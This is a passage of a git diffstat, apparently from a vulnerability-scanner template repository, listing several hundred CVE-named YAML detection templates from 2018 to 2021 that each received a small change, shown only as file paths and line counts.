http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20608.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 2 +- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7490.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9161.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 2 +- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18665.yaml | 2 +- http/cves/2019/CVE-2019-18818.yaml | 2 +- http/cves/2019/CVE-2019-18922.yaml | 2 +- http/cves/2019/CVE-2019-18957.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19781.yaml | 2 +- http/cves/2019/CVE-2019-19824.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2579.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2725.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9041.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-0618.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 2 +- http/cves/2020/CVE-2020-10199.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11455.yaml | 2 +- http/cves/2020/CVE-2020-11529.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 2 +- http/cves/2020/CVE-2020-12124.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 2 +- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15920.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 2 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17518.yaml | 2 +- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-19625.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24571.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 2 +- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-27191.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27735.yaml | 2 +- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-3187.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 2 +- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35951.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5307.yaml | 2 +- http/cves/2020/CVE-2020-5405.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5412.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 3 +-- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9047.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 2 +- http/cves/2021/CVE-2021-20090.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21315.yaml | 2 +- http/cves/2021/CVE-2021-21345.yaml | 2 +- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21479.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21881.yaml | 2 +- http/cves/2021/CVE-2021-21972.yaml | 2 +- http/cves/2021/CVE-2021-21973.yaml | 2 +- http/cves/2021/CVE-2021-21975.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 2 +- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 2 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 2 +- http/cves/2021/CVE-2021-24155.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- 